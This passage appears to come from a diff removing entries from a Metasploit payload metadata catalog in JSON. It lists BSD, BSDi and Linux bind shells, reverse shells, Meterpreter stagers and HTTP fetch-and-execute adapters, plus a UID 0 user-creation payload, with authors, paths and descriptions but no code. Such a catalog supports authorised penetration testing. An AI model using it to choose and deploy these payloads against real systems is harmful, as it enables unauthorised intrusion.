(IPv6)", - "fullname": "payload/bsd/x86/shell_bind_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Listen for a connection and spawn a command shell over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_bind_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_find_port": { - "name": "BSD Command 
Shell, Find Port Inline", - "fullname": "payload/bsd/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_find_tag": { - "name": "BSD Command Shell, Find Tag Inline", - "fullname": "payload/bsd/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "x86", - 
"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_reverse_tcp_ipv6": { - "name": "BSD Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/bsd/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Connect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsdi/x86/shell/bind_tcp": { - "name": "BSDi Command Shell, Bind TCP Stager", - "fullname": "payload/bsdi/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": 
"bsdi/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsdi/x86/shell", - "stager_refname": "bsdi/x86/bind_tcp" - }, - "payload_bsdi/x86/shell/reverse_tcp": { - "name": "BSDi Command Shell, Reverse TCP Stager", - "fullname": "payload/bsdi/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsdi/x86/shell", - "stager_refname": "bsdi/x86/reverse_tcp" - }, - "payload_bsdi/x86/shell_bind_tcp": { - "name": "BSDi Command Shell, Bind TCP Inline", - "fullname": "payload/bsdi/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "optyx " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsdi/x86/shell_find_port": { - "name": "BSDi Command Shell, Find Port Inline", - "fullname": "payload/bsdi/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "optyx " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsdi/x86/shell_reverse_tcp": { - "name": "BSDi Command Shell, Reverse TCP Inline", - "fullname": "payload/bsdi/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "optyx " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/linux/http/aarch64/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack " - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/http/aarch64/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": 
"linux/aarch64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/aarch64/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/aarch64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/aarch64/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/http/aarch64/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/armbe/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/armbe/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTP 
server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/armbe/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/armbe/shell_bind_tcp": { - "name": "HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"Brendan Watters", - "Spencer McIntyre", - "Balazs Bucsay @xoreipeip " - ], - "description": "Fetch and execute an ARMBE payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/armle/adduser": { - "name": "HTTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/http/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/adduser", - "staged": false - }, - "payload_cmd/linux/http/armle/exec": { - "name": "HTTP Fetch, Linux 
Execute Command", - "fullname": "payload/cmd/linux/http/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nExecute an arbitrary command", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/exec", - "staged": false - }, - "payload_cmd/linux/http/armle/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter/bind_tcp", - "staged": 
true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/http/armle/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/http/armle/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": 
true, - "ref_name": "cmd/linux/http/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/armle/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/armle/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/armle/shell/bind_tcp": { - "name": "HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/http/armle/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo ", - "tkmru" - 
], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/http/armle/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ", - "hal" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/armle/shell_reverse_tcp": { - "name": 
"HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mips64/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": 